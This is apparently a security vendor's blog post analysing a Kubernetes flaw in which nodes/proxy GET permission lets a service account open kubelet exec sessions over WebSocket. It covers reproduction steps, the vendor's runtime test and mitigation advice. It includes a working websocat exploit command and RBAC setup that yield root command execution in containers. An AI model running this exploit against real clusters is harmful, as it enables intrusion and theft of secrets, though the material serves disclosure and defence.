Your Monitoring Stack Just Became a RCE Vector: A Deep-Dive into the Kubernetes nodes/proxy RCE
Last week, security researcher Graham Helton published a report that a service account with nothing more than nodes/proxy GET permission can achieve full remote code execution (RCE) in any container on a Kubernetes node. This permission is routinely granted to monitoring tools like Prometheus, Datadog, and Grafana for metrics collection. Depending on the security configuration, this could lead to a full cluster takeover.
We investigated whether workloads running under Edera's isolation were vulnerable. The short answer: they're not. But the longer answer is more interesting. It reveals why architectural decisions matter, why defense in depth isn't just a marketing buzzword, and why the Kubernetes community needs to think harder about secure defaults.
First, a Thank You to the Security Research Community
Before we dive in, we want to acknowledge Graham Helton's work. Security researchers who responsibly disclose vulnerabilities like this are heroes. They make the entire ecosystem safer, often without recognition or compensation. The Kubernetes community, and especially those of us running AI workloads, financial services, and healthcare applications owe researchers like Graham a debt of gratitude.
If you haven't read Graham's original post, we encourage you to do so. It's thorough, is a great introduction to some Kubernetes internals, and provides important context for what follows.
How a Kubernetes GET Request Turns Into Full Remote Code Execution
To understand this vulnerability, we need to cover some background on how Kubernetes handles container execution and how WebSocket connections work.
How Kubernetes Exec Works
When you run kubectl exec -it my-pod -- /bin/bash, there’s a lot that happens under the hood:
- Your
kubectlclient sends a request to the Kubernetes API server - The API server checks your RBAC permissions for
pods/exec CREATE - If authorized, the API server proxies your request to the kubelet’s API endpoint on the node
- The kubelet connects to the container runtime (containerd, CRI-O, edera, etc.) to start the
execsession - A bidirectional stream is established for stdin/stdout/stderr
The key word here is CREATE. Executing commands in a container is considered a write operation, so it requires the create verb on the pods/exec RBAC resource.
The WebSocket Protocol Primer
WebSocket is a protocol that enables bidirectional communication over a single TCP connection. It's used extensively in Kubernetes for familiar operations like exec, attach, and port-forward.
Crucially, WebSockets begin with an HTTP GET request. This is called the "upgrade handshake" and is defined in RFC 6455. The client sends a GET request with special headers, and the server responds with HTTP 101 (Switching Protocols) to upgrade the connection.
GET /exec/default/my-pod/container?command=id HTTP/1.1
Host: 10.0.0.5:10250
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
Sec-WebSocket-Protocol: v4.channel.k8s.io
The RBAC and WebSocket Mismatch That Enables RCE
Here's where things get spicy:
- The kubelet maps HTTP methods to RBAC verbs: GET →
get, POST →create - The
/execendpoint normally expects POST requests - But WebSocket connections use GET for the handshake
- The kubelet sees a GET request, checks for
getpermission, and allows it - The connection upgrades, and suddenly you have an all-powerful
execsession
Result: If you have nodes/proxy GET permission, you can bypass the pods/exec CREATE RBAC requirement entirely. This matters because of how organizations treat these two permissions:
pods/exec CREATEis considered highly sensitive and security teams rightly audit it carefully. It's typically restricted to cluster administrators, on-call engineers, or specific debugging roles. Granting it broadly is a red flag in any security review.nodes/proxy GETis considered read-only. It's routinely granted to monitoring tools, often across the entire cluster. Even mature security teams rarely take notice because it's typically just GET requests for metrics.
Read differently: your Prometheus service account, which you thought could only scrape metrics, can execute arbitrary commands as root into any container on any node it can reach.
A permission typically granted for observability becomes a permission for remote code execution.
Why nodes/proxy Exists and How It Can Be Abused
The nodes/proxy resource allows direct communication with the kubelet API. It's generally used for:
- Metrics collection: Prometheus scraping /metrics and /stats
- Health monitoring: Tools checking node health status
- Log aggregation: Accessing container logs directly
Many orgs grant this permission broadly to their observability stack. A typical ClusterRole can look like this:
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: monitoring-role
rules:
- apiGroups: [""]
resources: ["nodes/proxy"]
verbs: ["get"]
It's just GET. Read-only. What could go wrong? When exploiting this vulnerability, everything. And Kubernetes maintainers have signaled that this is working as intended and won’t be patched.
Why Kubernetes Considers nodes/proxy RCE “Working as Intended”
When this vulnerability was reported to the Kubernetes Security Team, they determined it is "working as intended" and will not receive a CVE. Their position is that nodes/proxy has always been a privileged resource, and the proper fix is KEP-2862 (Fine-Grained Kubelet API Authorization), expected to reach GA in Kubernetes 1.36 (April 2026).
Step-by-Step: Reproducing the nodes/proxy RCE
We built a test harness to validate this vulnerability in our environment. Here's how to reproduce it in yours.
Step 1: Create a Service Account with Minimal Permissions
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: vuln-test-role
rules:
- apiGroups: [""]
resources: ["nodes/proxy"]
verbs: ["get"]
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: vuln-test-sa
namespace: default
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: vuln-test-binding
subjects:
- kind: ServiceAccount
name: vuln-test-sa
namespace: default
roleRef:
kind: ClusterRole
name: vuln-test-role
apiGroup: rbac.authorization.k8s.io
Step 2: Verify Permissions
# Generate a token for the service account
TOKEN=$(kubectl create token vuln-test-sa -n default --duration=1h)
# List permissions - look for "nodes/proxy" with "get" verb
kubectl auth can-i --list --token="$TOKEN" | grep nodes/proxy
# Expected output: nodes/proxy [] [] [get]
# Verify we do not have pods/exec permission
kubectl auth can-i create pods/exec --token="$TOKEN"
# Expected output: no
Note: On EKS and other managed Kubernetes platforms, kubectl auth can-i get nodes/proxy may incorrectly return "no" due to webhook authorizer limitations. Use kubectl auth can-i --list instead, which correctly shows the granted permissions.
Step 3: Deploying a Target Pod for Exploitation
apiVersion: v1
kind: Pod
metadata:
name: victim
namespace: default
spec:
containers:
- name: victim
image: python:slim
command: ["sleep", "infinity"]
env:
- name: SECRET_API_KEY
value: "super-secret-key-12345"
- name: DATABASE_PASSWORD
value: "production-db-password"
Step 4: Exploiting nodes/proxy for Remote Code Execution
From an attacker pod (or any machine with network access to the kubelet):
# Get a token for the service account
TOKEN=$(kubectl create token vuln-test-sa --duration=1h)
# Get the node's internal IP
NODE_IP=$(kubectl get node <node-name> -o jsonpath='{.status.addresses[?(@.type=="InternalIP")].address}')
# The exploit - using websocat to establish a WebSocket exec session
websocat -k \
-H "Authorization: Bearer $TOKEN" \
--protocol v4.channel.k8s.io \
"wss://${NODE_IP}:10250/exec/default/victim/victim?output=1&error=1&command=id"
Result on standard containers:
uid=0(root) gid=0(root) groups=0(root)
{"metadata":{},"status":"Success"}
You now have RCE as root inside the container. From here, an attacker can:
- Extract environment variables (secrets, API keys, database credentials)
- Read mounted volumes (potentially including service account tokens)
- Make network requests to internal services
- Install persistence mechanisms
- Attempt container escape via kernel vulnerabilities
Testing the nodes/proxy RCE Against Edera
It’s never a good feeling when your favorite distributed system is vulnerable to a massive remote code execution vulnerability.
At Edera, we build on top of, and harden Kubernetes. But how did this vulnerability play out? Did our microVM container execution environment limit remote code execution to a single isolation domain?
To test, we deployed identical victim pods: one running on the standard containerd runtime, one running Edera’s edera runtime.
Exploit Result on a Standard Kubernetes Container Runtime
$ websocat -k --protocol v4.channel.k8s.io \
"wss://${NODE_IP}:10250/exec/default/victim-standard/victim?output=1&command=id"
uid=0(root) gid=0(root) groups=0(root)
{"metadata":{},"status":"Success"}
Vulnerable. The attacker achieves RCE.
Exploit Result on an Edera-Isolated Container
$ websocat -k --protocol v4.channel.k8s.io \
"wss://${NODE_IP}:10250/exec/default/victim-edera/victim?output=1&command=id"
HTTP/1.1 405 Method Not Allowed
Allow: POST
The request is rejected before reaching the container. Not vulnerable 😮💨
Why Edera Is Protected
Let's be transparent: this protection is a beneficial side-effect of Edera's architecture, not a feature we specifically designed to counter this vulnerability.
Edera implements the Container Runtime Interface (CRI) differently than traditional runtimes. When the kubelet forwards an exec request to the Edera runtime, our streaming endpoint (written in Rust and depending on zero Go components) only accepts POST requests. The WebSocket upgrade handshake, which arrives as a GET request, is rejected with HTTP 405 Method Not Allowed.
From the attacker's perspective, the request never gets far enough to establish a session. The runtime itself refuses to process it.
Comparing Exec Behavior Between Standard Runtimes and Edera
We can see this difference by testing the HTTP methods directly:

Both runtimes support legitimate kubectl exec operations (which use POST through the API server). But only Edera blocks the direct WebSocket GET exploit.
But What If Edera Were Vulnerable?
This is where defense in depth becomes important. Let's imagine that Edera's exec endpoint did accept the WebSocket upgrade.
The attacker would land inside a microVM with its own dedicated kernel.
Comparing Blast Radius: Shared Kernel vs Isolated MicroVM
Standard container compromise: Attacker has RCE in a container sharing the host kernel - Can see all processes on the node via /proc (if not properly namespaced) - Can potentially exploit kernel vulnerabilities to escape to the host - Can access shared resources (cgroups, network namespaces) for lateral movement - One compromised container can lead to a compromise of the entire node.
Edera container compromise: Attacker has RCE inside an isolated microVM - Cannot see processes from other pods or the host as there's no shared /proc - Kernel exploits affect only that microVM's kernel, not the host - No shared kernel memory, cgroups, or namespaces to abuse - The blast radius is contained to a single workload.
Why nodes/proxy RCE Is Especially Dangerous for AI Workloads
Organizations running AI inference services face a particular risk. These workloads often:
- Hold model weights worth millions in R&D investment
- Have access to GPU resources (high-value targets)
- Connect to data pipelines containing sensitive training data
- Run with elevated permissions for performance reasons
A single container compromise in a standard Kubernetes cluster could lead to model exfiltration, data theft, or corruption of inference results. With Edera's isolation, even a successful exec exploit cannot reach beyond the boundaries of the compromised microVM.
When Kubernetes Won’t Patch: Understanding the Real Risk
Earlier, we mentioned that the Kubernetes Security Team determined this behavior is "working as intended." Here's the full context of their response:
Following further review with SIG-Auth and SIG-Node, we are confirming our decision that this behavior is working as intended and will not be receiving a CVE. While we agree that nodes/proxy presents a risk, a patch to restrict this specific path would require changing authorization in both the kubelet (to special-case the /exec path) and the kube-apiserver (to add a secondary path inspection for /exec after mapping the overall path to nodes/proxy) to force a double authorization of “get” and “create.” We have determined that implementing and coordinating such double-authorization logic is brittle, architecturally incorrect, and potentially incomplete.
We remain confident that KEP-2862 (Fine-Grained Kubelet API Authorization) is the proper architectural resolution. Rather than changing the coarse-grained nodes/proxy authorization, our goal is to render it obsolete for monitoring agents by graduating fine-grained permissions to GA in release 1.36, expected in April 2026.
The Kubernetes Security Team
Why Kubernetes Rejects a Patch for nodes/proxy
The Kubernetes Security Team's reasoning is thoughtful:
- Architectural integrity: A targeted patch would require coordinated changes across multiple components with special-case logic. This is the kind of complexity that could lead to future vulnerabilities.
- Proper fix exists: KEP-2862 introduces fine-grained permissions (
nodes/metrics,nodes/stats,nodes/log) that give monitoring tools least privileged access without theexeccapability. - Deprecation path: Once KEP-2862 reaches GA and sees adoption,
nodes/proxycan be deprecated for monitoring use cases.
Why the Risk Has Changed Since nodes/proxy Was Designed
We understand the difficult tradeoffs the Kubernetes security team has to navigate for features with a large blast radius and complexity. KEP-2862 is genuinely the right long-term solution.
But we believe the risk calculus has changed.
KEP-2862 is expected to GA in April 2026. After that, it requires adoption across the entire ecosystem. Monitoring tools need to update their RBAC requirements, Helm charts need revision, and cluster operators need to migrate. Realistically, most production clusters won't have this protection until 2027 or later.
Kubernetes doesn’t just run stateless web apps. It's running AI training pipelines with proprietary model weights, financial trading systems, and healthcare applications with patient data. The blast radius of a monitoring stack compromise in 2026 is categorically different from 2016.
This vulnerability illustrates a difficult truth: you cannot rely solely on upstream security to protect your workloads. This is why architectural isolation matters. It's not about mitigating vulnerabilities, it's about building systems that remain resilient to compromise even when vulnerabilities exist, and even when patches aren't coming.
How Operators, Maintainers, and Vendors Should Respond
For cluster operators:
- Audit your RBAC policies for nodes/proxy permissions immediately
- Consider whether monitoring tools truly need direct kubelet access
- Implement network policies restricting access to kubelet port 10250
- Plan your migration to KEP-2862 fine-grained permissions when they GA
- Adopt workload isolation technologies that limit blast radius regardless of upstream decisions
For the Kubernetes project:
- Prioritize KEP-2862 adoption and provide clear migration guides
- Consider whether new clusters should default to fine-grained authorization
- Document the security implications of nodes/proxy more prominently
For the industry:
- Recognize that the era of "detect and respond" is insufficient for container security
- Recognize that upstream maintainers, even excellent ones, cannot protect you from every threat
- Invest in isolation technologies that make successful exploits containable
- Assume vulnerabilities will exist, and architect systems to contain them
- Treat defense in depth as a requirement, not an option
nodes/proxy RCE Proves Why Architectural Isolation Matters
The nodes/proxy GET vulnerability is a reminder that distributed systems security is hard. Even benign permissions become attack vectors when combined with protocol idiosyncrasies. And sometimes, even when you report these issues, upstream maintainers make reasonable decisions that still leave your workloads exposed.
Edera happens to block this particular exploit due to architectural decisions in our CRI implementation. But the deeper lesson isn't "use Edera", it's that defense in depth works. When you isolate workloads at the kernel level, even novel vulnerabilities become containable events rather than cluster-wide compromises.
The Kubernetes community has an opportunity to build systems that are resilient and secure by default. KEP-2862 is a step in the right direction. But until secure defaults are the norm, and even after they are, architectural isolation remains your last line of defense.
We hope this analysis contributes to that conversation and encourages the ecosystem to think beyond "patch or don't patch" and toward "how do we contain the blast radius when things go wrong?"
Thanks again to Graham Helton for the original vulnerability research.
Have questions or want to discuss isolation strategies? Reach out to us at security@edera.dev.
FAQ
What is the Kubernetes nodes/proxy RCE vulnerability?
The nodes/proxy RCE vulnerability allows attackers with GET access to nodes/proxy to establish WebSocket exec sessions and execute arbitrary commands inside containers.
Why is nodes/proxy considered dangerous?
Although often treated as read-only, nodes/proxy grants direct access to the kubelet API, which can be abused to bypass RBAC protections.
Are monitoring tools like Prometheus affected?
Yes. Monitoring tools are frequently granted nodes/proxy GET permissions, making them potential attack vectors if compromised.
Why won’t Kubernetes patch this vulnerability?
The Kubernetes Security Team considers this behavior “working as intended” and plans to address it through fine-grained kubelet authorization (KEP-2862).
How does isolation change the impact of this RCE?
With isolated runtimes, even successful exec exploits are contained within a single workload and cannot compromise the node or other pods.
.png)
-3.png)